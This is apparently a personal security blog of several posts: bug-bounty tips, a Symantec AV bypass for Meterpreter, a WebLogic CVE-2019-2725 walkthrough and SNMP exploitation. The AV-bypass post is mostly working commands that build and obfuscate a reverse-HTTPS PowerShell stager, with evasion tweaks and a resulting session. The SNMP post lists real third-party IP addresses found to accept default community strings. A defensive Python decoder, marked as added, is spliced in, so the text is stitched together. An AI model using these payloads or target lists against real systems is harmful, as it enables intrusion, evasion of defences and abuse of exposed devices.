I decided to venture into the world of bug hunting in late 2018. I started with HackerOne, Synack and Bugcrowd, and here are some of my tips & experiences from my virgin journey. For a start, I am a full time Cyber Security Advisor specializing in Penetration Testing and Incident Response. I have a background in Vulnerability Assessment, SIEM and Compliance Testing. In total I have been in IT security for more than 15 years of my career.
1. Bug hunting is by far the most challenging experience in my career. In my honest opinion, it beats any certification/training in the market. It is a great way to learn something from scratch. There are tons of materials on the Web. My suggestion is to read up on as much material as you can get hold of. Some good sources include HackerOne public reports, Real World Bug Hunting and Web Hacking 101 by Peter Yaworski and Orange Tsai. Medium is a great place for blogs too.
2. Get a mentor if you can. It is much faster if you have someone more experienced in bug hunting to help you get started. Though, not many people are willing to share their skills due to the competitive nature of bug hunting. Good places to look for help are people that you know in real life. Get involved in your local social/special interest group meetups. Nothing beats personal connections, certainly not trying to direct message a cocky hacker on Twitter.
3. Look for easy bugs such as cross-domain referer leaks, private information leaks to 3rd parties, missing authorization, CSRF, etc. The reason why bug hunting is so difficult is that there are just so many hackers testing the same programme. By the time you start hunting, there have already been over 100 bugs reported, so do prepare for duplicates after submission.
4. Practice report writing, paying special attention to impact. Different platforms have different expectations. All platforms expect bugs to be reproducible based on your report, so make each bullet point clear and concise. After that, make sure the impact is clearly described. Avoid cutting and pasting VA reports. Some platforms will deduct your reputation points for hypothetical reports, so beware. Bug hunting reports are actual hacking PoCs: you need to be able to carry out the attack and show the business impact. Include screenshots with descriptions of each step.
5. Do not give up. When I first started on HackerOne, I was dipping under 100 rep points, but gradually managed to bring it up to 300+. I also made about USD3000 combined on different platforms. But the initial frustration almost made me give up. I can attest that pen-testing in my day job is far easier than bug hunting.
6. Start with programmes that do not pay bounties. It is easier and more likely to find a bug there than on paid ones due to competitiveness. Once you have an idea, go ahead and shoot for paid bounties. Also, if you feel it is too difficult to find valid bugs on a bug bounty platform, just test some random site; you'll be amazed at how easy it is to spot a bug (even severe ones) on websites that do not participate in bug bounties. But pay special attention to the law, as you might be crossing the line here. If they have a responsible disclosure programme, you may opt to inform them of your findings.
7. Try to understand what each platform or programme is looking for. E.g. programme ABC is interested in content spoofing, so if you find such bugs, they will more likely pay for them. The same bug might not be accepted on programme XYZ, simply because their risk registers are different. It is hard to say which bugs will be accepted, so read their policy carefully.
8. Be respectful to both programme and platform staff. They get to determine if your bugs get triaged. The final say will be determined by the programme owner or platform staff.
9. Be creative with your bugs; if you expect to only hunt for the OWASP Top 10, you will be disappointed. Such bugs are heavily hunted and, like Pokemon, are less likely to appear. Be resourceful, read other hackers' reports and try to innovate. Do not copy and paste other hackers' reports, you will most likely get rejected.
10. This is especially true on HackerOne: it is easier to get an accepted bug on programmes that are not run by HackerOne staff. I don't know why, but I feel the programme owners are more lenient with acceptable bugs than HackerOne staff. This is just my observation.
11. Lastly, keep abreast of the latest research in cyber security. There are many notable researchers in this field; James Kettle and Orange Tsai, for example, are pioneers that have dropped pretty big findings recently. Follow them on Twitter. Ben Sadeghipour, a notable HackerOne hacker, is also worth following as he live streams bug bounty tips.
Overall, I am an old fart of 42 years but still learning, and the guys I am learning from are half my age. While most of my peers are now Head of Info Sec or CISOs, I choose to follow my mid-life crisis; that is, to continue to remain a tech guy. I'm getting better and my goal for next year (2020) is to hit 900 rep on HackerOne. It is definitely challenging to balance bug hunting with a family and a full time job, but success is so sweet. I've made enough money from bounties in the last 4 months to buy my whole family flight tickets to Europe for our holiday!
buf="\x6a\x0a\x5e\x31\xdb Cyber Security Rants, w00t!"
Saturday, November 30, 2019
Sunday, August 11, 2019
SEP AV Bypass For Meterpreter
Here is a simple method to stop Symantec Endpoint Protection AV from detecting Meterpreter. The technique is not unique and has been documented on other blogs. I take no credit for it, but it is still worth its salt as I had some success using it during my engagements. This is really useful when you have gained a foothold on a victim host but you can't disable the AV because you don't have the password. Remember, most AV engines require an additional password to disable them even though you already have SYSTEM privilege. So, the next best thing you can do is try to bypass it. As long as you do not touch disk and execute code in memory, you have a fair chance of evading it, but the HIPS (Host IPS) might be a pain, so I found this technique documented here. The difference is I used unicorn to further obfuscate the payload in ps1 format.
1. Firstly, the AV will most certainly catch the default certificate used by msf. To get around it, generate a fake certificate using the impersonate_ssl module in msfconsole.
msf5 auxiliary(gather/impersonate_ssl) > set rhosts www.google.com
rhosts => www.google.com
msf5 auxiliary(gather/impersonate_ssl) > run
[*] Running module against 172.217.166.132
[*] 172.217.166.132:443 - Connecting to 172.217.166.132:443
[*] 172.217.166.132:443 - Copying certificate from 172.217.166.132:443
/OU=No SNI provided; please fix your client./CN=invalid2.invalid
[*] 172.217.166.132:443 - Beginning export of certificate files
[*] 172.217.166.132:443 - Creating looted key/crt/pem files for 172.217.166.132:443
[+] 172.217.166.132:443 - key: /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__624209.key
[+] 172.217.166.132:443 - crt: /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__236829.crt
[+] 172.217.166.132:443 - pem: /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__976059.pem
[*] Running module against 2404:6800:4001:80f::2004
[*] 2404:6800:4001:80f::2004:443 - Connecting to 2404:6800:4001:80f::2004:443
[-] 2404:6800:4001:80f::2004:443 - 2404:6800:4001:80f::2004:443 No certificate subject or CN found
[*] Auxiliary module execution completed
2. Now generate the payload. I use reverse HTTPS with the fake cert.
msf5 auxiliary(gather/impersonate_ssl) > use payload/windows/meterpreter/reverse_https
msf5 payload(windows/meterpreter/reverse_https) > show options
Module options (payload/windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.8.103 yes The local listener hostname
LPORT 443 yes The local listener port
LURI no The HTTP Path
msf5 payload(windows/meterpreter/reverse_https) > set handlersslcert /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__976059.pem
handlersslcert => /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__976059.pem
msf5 payload(windows/meterpreter/reverse_https) > set stagerverifysslcert true
stagerverifysslcert => true
msf5 payload(windows/meterpreter/reverse_https) > generate -f psh-cmd
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAG <SNIP SNIP> ByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==
msf5 payload(windows/meterpreter/reverse_https) > generate -f psh-cmd -o /tmp/works.txt
[*] Writing 7359 bytes to /tmp/works.txt...
3. Use unicorn to obfuscate /tmp/works.txt (renamed to /tmp/works.ps1 below); you can remove the "%COMSPEC% /b /c start /b /min " prefix before running unicorn.
# python unicorn.py /tmp/works.ps1
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Happy Magic Unicorns.
[*******************************************************************************************************]
-----Custom PS1 Attack Instructions----
This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro.
Note if choosing the macro option, a large ps1 file may exceed the amount of carriage returns allowed by
VBA. You may change the number of characters in each VBA string by passing an integer as a parameter.
Examples:
python unicorn.py harmless.ps1
python unicorn.py myfile.ps1 macro
python unicorn.py muahahaha.ps1 macro 500
The last one will use a 500 character string instead of the default 380, resulting in less carriage returns in VBA.
[*******************************************************************************************************]
[*] Exported powershell output code to powershell_attack.txt
3a. The obfuscated output is now in powershell_attack.txt, which can be used on the victim host with AV.
# cat /home/gr00t/Downloads/unicorn/powershell_attack.txt
powershell /w 1 /C "s''v Ls -;s''v Ew e''c;s''v ixN ((g''v Ls).value.toString()+(g''v Ew).value.toString());powershell (g''v ixN).value.toString() ('cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlACAAYQBRAEIAbQBBAEMAZwBBAFcAdwBCAEoAQQBHADQAQQBkAEEAQgBRAEEASABRAEEAYwBnAEIAZAB <SNIP SNIP> wBCADEAQQBFAGsAQQBWAGcAQgB4AEEASABvAEEAYQB3AEIAcgBBAEcARQBBAGEBAEgAQQBBAFAAUQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFIAQQBCAHAAQQBHAEUAQQBaAHcAQgB1AEEARwA4AEEAYwB3AEIAMABBAEcAawBBAFkAdwBCAHoAQQBDADQAQQBVAEEAQgB5AEEARwA4AEEAWQB3AEIAbABBAEgATQBBAGMAdwBCAGQAQQBEAG8AQQBPAGcAQgBUAEEASABRAEEAWQBRAEIAeQBBAEgAUQBBAEsAQQBBAGsAQQBIAE0AQQBLAFEAQQA3AEEAQQA9AD0ACgA=')"
3b. Now you can use msfconsole to catch the reverse HTTPS shell. Execute powershell_attack.txt on the victim host after modifying the value.toString() keywords (e.g. to vAlue.ToString()) to avoid AV detection:
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.8.106 yes The local listener hostname
LPORT 443 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Wildcard Target
meterpreter > exploit
[*] Started HTTPS reverse handler on https://192.168.8.106:443
[*] https://192.168.8.106:443 handling request from 192.168.8.104; (UUID: qbdxxru2) Meterpreter will verify SSL Certificate with SHA1 hash e27a4b10aeea1b1e22a1ee86d9a6d7f0584d08e9
[*] https://192.168.8.106:443 handling request from 192.168.8.104; (UUID: qbdxxru2) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 4 opened (192.168.8.106:443 -> 192.168.8.104:50302) at 2019-03-19 17:08:05 +0800
meterpreter > sysinfo
Computer : DESKTOP-O7UQ1HA
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
4. On the victim host, you'll notice that the AV did not trigger.
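From the defender's side, the launcher at step 3a is exactly what a Sysmon or EDR process-creation event records, and an analyst has to undo the same two tricks it relies on: the tick-splitting of cmdlet aliases (s''v / g''v) and the nested -EncodedCommand layers. The following Python triage helper is an added example, not code from this post, from unicorn or from Metasploit; it strips the empty-string insertions, then repeatedly finds base64 blobs that decode to printable UTF-16LE text, and reports indicators such as a hidden window and -nop. The sample command line is constructed in the same wrapper shape as the one above, with a harmless Write-Host as the innermost script.

```python
"""Triage helper for obfuscated PowerShell launchers of the shape shown above:
tick-split cmdlet aliases wrapping nested -EncodedCommand layers
(added example, not code from the post, from unicorn or from Metasploit)."""
import base64
import re

# A run of base64 characters long enough to be an encoded command, not a word.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def strip_tick_splitting(cmd: str) -> str:
    """s''v and g''v are the sv/gv (Set-/Get-Variable) aliases with empty
    strings inserted; PowerShell joins the pieces back together, so we do too."""
    return cmd.replace("''", "").replace("``", "")


def try_decode_utf16_b64(blob: str):
    """Return the plaintext if blob is base64 of printable UTF-16LE text (the
    encoding -EncodedCommand expects), otherwise None."""
    try:
        raw = base64.b64decode(blob, validate=True)
        if len(raw) % 2:
            return None
        text = raw.decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are ValueErrors
        return None
    if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def decode_layers(cmd: str, max_depth: int = 5):
    """Return [command line, stage 1, stage 2, ...] down to the innermost script."""
    layers = [cmd]
    current = strip_tick_splitting(cmd)
    for _ in range(max_depth):
        inner = None
        for m in B64_BLOB.finditer(current):
            inner = try_decode_utf16_b64(m.group(0))
            if inner:
                break
        if not inner:
            break
        layers.append(inner)
        current = strip_tick_splitting(inner)
    return layers


def triage(cmd: str) -> dict:
    """Indicators an analyst wants at a glance, plus the fully decoded script."""
    layers = decode_layers(cmd)
    flat = " ".join(strip_tick_splitting(layer) for layer in layers).lower()
    return {
        "tick_splitting": "''" in cmd or "``" in cmd,
        "encoded_layers": len(layers) - 1,
        "hidden_window": bool(re.search(r"(?:-w|/w)\s+(?:1|hidden)\b", flat)),
        "no_profile": "-nop" in flat,
        "plaintext": layers[-1],
    }


def _encode(script: str) -> str:
    """UTF-16LE + base64, as -EncodedCommand expects; used only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample in the same wrapper shape as the command above; the
# innermost script is a harmless Write-Host so this block is safe to run.
INNER_SCRIPT = "Write-Host 'constructed sample, decoded successfully'"
STAGE1 = "powershell.exe -nop -w hidden -e " + _encode(INNER_SCRIPT)
SAMPLE_CMDLINE = (
    "powershell /w 1 /C \"s''v Ls -;s''v Ew e''c;"
    "s''v ixN ((g''v Ls).value.toString()+(g''v Ew).value.toString());"
    "powershell (g''v ixN).value.toString() ('" + _encode(STAGE1) + "')\""
)

if __name__ == "__main__":
    for depth, layer in enumerate(decode_layers(SAMPLE_CMDLINE)):
        print(f"layer {depth}: {layer[:80]}")
    print(triage(SAMPLE_CMDLINE))
```

The printable-text check is what stops the decoder from treating a random hash or GUID as a layer; real -EncodedCommand payloads are always text, so a blob that decodes to control characters is left alone.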
Tuesday, July 2, 2019
Exploiting CVE-2019-2725: Oracle WebLogic Server Deserialization
Introduction
Oracle recently released an advisory pertaining to a serious deserialization flaw that impacts WebLogic Server versions 10.3.6.0 & 12.1.3.0. This flaw is very trivial to exploit, leading to RCE with uid=1000(oracle) rights. There are exploits in the wild; the simplest one to use can be found in Metasploit.
Installing Vulnerable Docker
To safely test this exploit without getting in trouble with the law, you can download a vulnerable Docker container. Here is mine:
Detection
The easiest way to detect a WebLogic instance is to use the Nmap NSE script weblogic-t3-info.
$ sudo nmap --script weblogic-t3-info -p 49163 127.0.0.1 -sSV
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-02 20:21 +08
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00013s latency).
PORT STATE SERVICE VERSION
49163/tcp open http Oracle WebLogic admin httpd
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 12.1.3.0)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.55 seconds
Exploitation
The fastest way to exploit this bug is to use "exploit/multi/misc/weblogic_deserialize_asyncresponseservice" in msfconsole:
Set up the RHOST, RPORT and PAYLOAD:
Once everything is in place, run the exploit against your docker container:
Exploit Analysis & Summary
This exploit is so easy to run that it is being used to randomly hit servers across the world to mine cryptocurrency. It is basically a one-liner exploit; take a look at its payload in real time using tcpdump:
The payload sends a reverse shell in bash to an attacker IP address on port 4444. You can practically swap it out for anything, e.g. RCE. Being so simple to exploit, you may think that most organizations have patched their systems already. Well, the mighty US DoD (US Department of Defense) was caught with their pants down during a bounty. Often the simplest things are the ones that catch us by surprise. During my pen-test engagements, very often I'd obtain critical findings from simple things like weak admin credentials, missing critical patches & stupid misconfigurations. So, if you are a pen-tester, always start with the basics. Enumerate the targets thoroughly, do not leave any stone unturned. The more you know about your targets, the more likely you'll be able to hack them. The important piece is the detection/enumeration of vulnerabilities. The exploitation is usually easy once you know what you are after.
Friday, June 14, 2019
Evil-Droid Demo Part 1-3
Here are a few recorded PoCs of Evil-Droid by Mascerano Bachir in action. They were recorded for a security awareness talk that I will be presenting. Pretty cool tool: it decompiles an APK to insert your payload of choice. I just chose the msf Meterpreter; it works like a charm.
Monday, March 25, 2019
Saturday, March 23, 2019
Exploiting SNMP For Fun & Profit
Introduction
The SNMP protocol is mostly used for monitoring device system resources such as traffic utilization, uptime, OS or firmware version, processes, interface speed, etc. By default it listens on port 161/udp. It's an old protocol but still widely used to monitor traffic utilization, primarily on routers & switches. What I stumbled upon is how many of these devices are exposed on the Internet with default community strings. Some belong to major ISPs. These devices handle gigabits of traffic! Exploiting such devices is like taking candy from a child. Hackers could use them to launch amplification attacks, reroute traffic or take down Internet gateways.
Identification
The following are the steps to identify these devices. I use the Shodan command-line interface and an Nmap NSE script.
1. Using Shodan to find open SNMP ports (161/udp):
$ shodan download --limit 100 shodan-api-snmp.txt port:161 country:my
Search query: port:161 country:my
Total number of results: 9025
Query credits left: 92
Output file: shodan-api-snmp.txt.json.gz
[###################################-] 99% 00:00:01
Saved 100 results into file shodan-api-snmp.txt.json.gz
gr00t@adam:~/Downloads/snmp$ zcat shodan-api-snmp.txt.json.gz
{"_shodan": {"id": "5537b198-2081-4304-b4d6-4a39fa55cb2b", "options": {}, "ptr": true, "module": "snmp", "crawler": "70752434fdf0dcec35df6ae02b9703eaae035f7d"}, "hash": -1924632222, "os": null, "opts": {"raw": "30818202010004067075626c6963a275020466b16a5e0201000201003067306506082b06010201010100045942495041432d383530302e20482f573a20534844534c20284f72696f6e292076312e3030202f2048653130302f327878204353502076322e3320462f573a20352e35326831202831312053657074656d626572203230303729"}, "ip": 3680329889, "isp": "TM Net", "snmp": {"contact": "not set", "location": "not set", "name": "", "description": "BIPAC-8500. H/W: SHDSL (Orion) v1.00 / He100/2xx CSP v2.3 F/W: 5.52h1 (11 September 2007)"}, "port": 161, "hostnames": [], "location": {"city": "Alor Gajah", "region_code": "04", "area_code": null, "longitude": 102.20890000000003, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "78009", "dma_code": null, "country_code": "MY", "latitude": 2.3804000000000087}, "timestamp": "2019-03-23T07:31:41.164982", "domains": [], "org": "TM Net", "data": "BIPAC-8500. H/W: SHDSL (Orion) v1.00 / He100/2xx CSP v2.3 F/W: 5.52h1 (11 September 2007)", "asn": "AS4788", "transport": "udp", "ip_str": "219.93.96.161"}
{"_shodan": {"id": "9a89e29e-b932-4f36-9109-e232de48fa7f", "options": {}, "ptr": true, "module": "snmp", "crawler": "d264629436af1b777b3b513ca6ed1404d7395d80"}, "hash": 1282871131, "os": null, "opts": {"raw": "304802010004067075626c6963a23b020466b16a5e020100020100302d302b06082b06010201010100041f576972656c657373204e2047504f4e20726f75746572207769746820555342"}, "ip": 1743414711, "isp": "No.31-A, Jalan Tiara, Tiara Square", "snmp": {"contact": "", "location": "Taiwan", "name": "PMG5317-T20A", "description": "Wireless N GPON router with USB"}, "port": 161, "hostnames": [], "location": {"city": "Kuala Lumpur", "region_code": "14", "area_code": null, "longitude": 101.6757, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "59200", "dma_code": null, "country_code": "MY", "latitude": 3.1185000000000116}, "timestamp": "2019-03-23T09:51:25.626046", "domains": [], "org": "No.31-A, Jalan Tiara, Tiara Square", "data": "Wireless N GPON router with USB", "asn": "AS132435", "transport": "udp", "ip_str": "103.234.101.183"}
{"_shodan": {"id": "e5b20f51-0bb7-43d5-82a4-3250e41808d5", "options": {}, "ptr": true, "module": "snmp", "crawler": "d264629436af1b777b3b513ca6ed1404d7395d80"}, "hash": -625139007, "os": null, "opts": {"raw": "304302010004067075626c6963a236020466b16a5e0201000201003028302606082b06010201010100041a526f757465724f5320434352313030392d37472d31432d31532b"}, "ip": 762700881, "isp": "E-world Communication Sdn Bhd", "snmp": {"contact": "", "location": "", "name": "Empire-SVR-Eworld", "description": "RouterOS CCR1009-7G-1C-1S+"}, "port": 161, "hostnames": [], "location": {"city": null, "region_code": null, "area_code": null, "longitude": 112.5, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": null, "dma_code": null, "country_code": "MY", "latitude": 2.5}, "timestamp": "2019-03-23T09:47:30.036767", "domains": [], "org": "E-world Communication Sdn Bhd", "data": "RouterOS CCR1009-7G-1C-1S+", "asn": "AS134202", "transport": "udp", "ip_str": "45.117.228.81"}
{"_shodan": {"id": "771922cf-312e-4031-aa4a-af85290ccd78", "options": {}, "ptr": true, "module": "snmp", "crawler": "97b9d37f0484f45ce645307121c5c1ce0b3db578"}, "hash": -1001072405, "os": null, "opts": {"raw": "304602010004067075626c6963a239020466b16a5e020100020100302b302906082b06010201010100041d48502045544845524e4554204d554c54492d454e5649524f4e4d454e54"}, "ip": 717158293, "isp": "TM Net", "snmp": {"contact": "", "location": "", "name": "HP38F83B", "description": "HP ETHERNET MULTI-ENVIRONMENT"}, "port": 161, "hostnames": [], "location": {"city": "Kuala Lumpur", "region_code": "14", "area_code": null, "longitude": 101.73340000000002, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "54200", "dma_code": null, "country_code": "MY", "latitude": 3.1728999999999985}, "timestamp": "2019-03-23T09:36:25.155848", "domains": [], "org": "TM Net", "data": "HP ETHERNET MULTI-ENVIRONMENT", "asn": "AS4788", "transport": "udp", "ip_str": "42.190.247.149"}
{"_shodan": {"id": "77f8ef04-bd1c-4eaf-984b-e59ff45efe42", "options": {}, "ptr": true, "module": "snmp", "crawler": "70752434fdf0dcec35df6ae02b9703eaae035f7d"}, "hash": -1235570117, "os": null, "opts": {"raw": "3082004302010004067075626c6963a2820034020466b16a5e020100020100308200243082002006082b060102010101000414573334303056362d342e30364c2e30326a2d544d"}, "ip": 1009984985, "isp": "TM Net", "snmp": {"contact": "unknown", "location": "unknown", "name": "Innacomm", "description": "W3400V6-4.06L.02j-TM"}, "port": 161, "hostnames": [], "location": {"city": "Subang Jaya", "region_code": "12", "area_code": null, "longitude": 101.57119999999998, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "47600", "dma_code": null, "country_code": "MY", "latitude": 3.047300000000007}, "timestamp": "2019-03-23T10:30:20.120908", "domains": [], "org": "TM Net", "data": "W3400V6-4.06L.02j-TM", "asn": "AS4788", "transport": "udp", "ip_str": "60.51.37.217"}
{"_shodan": {"id": "c397faef-119c-4b8f-ad26-3a5cb8c7d041", "options": {}, "ptr": true, "module": "snmp", "crawler": "d264629436af1b777b3b513ca6ed1404d7395d80"}, "hash": 440659073, "os": null, "opts": {"raw": "3082003602010004067075626c6963a2820027020466b16a5e020100020100308200173082001306082b06010201010100040747455f312e3037"}, "ip": 1938119429, "isp": "TM Net", "snmp": {"contact": "D-Link", "location": "D-Link_DRS", "name": "DSL-2640B", "description": "GE_1.07"}, "port": 161, "hostnames": [], "location": {"city": "Kulai", "region_code": "01", "area_code": null, "longitude": 103.50110000000001, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "81000", "dma_code": null, "country_code": "MY", "latitude": 1.7258999999999958}, "timestamp": "2019-03-23T09:24:55.056330", "domains": [], "org": "TM Net", "data": "GE_1.07", "asn": "AS4788", "transport": "udp", "ip_str": "115.133.91.5"}
<SNIP>
2. Let's extract the IP addresses from the JSON output into a single file:
$ shodan parse --fields ip_str shodan-api-snmp.txt.json.gz > targets.txt
$ cat targets.txt
219.93.96.161
103.234.101.183
45.117.228.81
42.190.247.149
60.51.37.217
115.133.91.5
210.19.179.86
121.122.166.97
113.23.179.42
103.61.127.245
1.32.80.202
182.54.207.75
103.17.19.202
120.138.81.35
175.140.15.124
115.135.244.248
42.1.62.96
219.93.64.141
210.48.146.83
175.141.79.16
113.23.212.106
60.54.109.118
175.142.123.117
1.32.62.0
1.32.90.160
115.134.8.170
58.26.91.82
175.139.6.34
175.141.78.76
103.47.253.101
115.135.132.10
175.140.191.30
60.54.83.34
103.220.5.9
124.82.71.180
60.50.161.155
175.140.58.66
219.93.121.26
110.4.40.111
110.159.66.68
182.54.209.62
<SNIP>
3. Now, use Nmap with the NSE script snmp-brute to identify default community strings:
$ sudo nmap -iL targets.txt --script snmp-brute -p 161 -sU
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-23 20:07 +08
Nmap scan report for 219.93.96.161
Host is up (0.096s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 103.234.101.183
Host is up (0.021s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for 45.117.228.81
Host is up (0.027s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 42.190.247.149
Host is up (3.0s latency).
PORT STATE SERVICE
161/udp filtered snmp
Nmap scan report for 60.51.37.217
Host is up (0.030s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 115.133.91.5
Host is up (0.062s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 210.19.179.86
Host is up (0.011s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
<SNIP>
Nmap scan report for 103.17.19.202
Host is up (0.046s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| <empty> - Valid credentials
|_ public - Valid credentials
Nmap scan report for 120.138.81.35
Host is up (0.012s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for 175.140.15.124
Host is up (0.034s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 115.135.244.248
Host is up (0.040s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for cloud.eagleicvr.my (42.1.62.96)
Host is up (0.011s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 219.93.64.141
Host is up (0.059s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for automatchtask.company (210.48.146.83)
Host is up (0.012s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 175.141.79.16
Host is up (0.052s latency).
PORT STATE SERVICE
161/udp closed snmp
<SNIP>
Nmap scan report for 1.32.90.160
Host is up (0.040s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 115.134.8.170
Host is up (0.051s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 58.26.91.82
Host is up (0.011s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 175.139.6.34
Host is up (0.031s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 175.141.78.76
Host is up (0.042s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 103.47.253.101
Host is up (0.0095s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
<SNIP>
Nmap scan report for 124.82.71.180
Host is up (0.045s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 155.161.50.60.kbu01-home.tm.net.my (60.50.161.155)
Host is up (0.013s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for san-121-26.tm.net.my (219.93.121.26)
Host is up (0.19s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 110.4.40.111
Host is up (0.010s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 110.159.66.68
Host is up (0.023s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 182.54.209.62
Host is up (0.017s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
<SNIP ----- SNIP>
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 118.101.48.84
Host is up (0.016s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 183.171.225.98
Host is up (0.034s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 203.142.40.204
Host is up (0.021s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for mail.yunnamhc.com.my (221.133.35.75)
Host is up (0.011s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 1.32.86.122
Host is up (0.018s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 219.94.13.154
Host is up (0.014s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 60.51.66.36
Host is up (0.037s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 115.135.244.190
Host is up (0.031s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 115.132.33.5
Host is up (0.065s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 121.120.14.52
Host is up (0.99s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
|_ public - Valid credentials
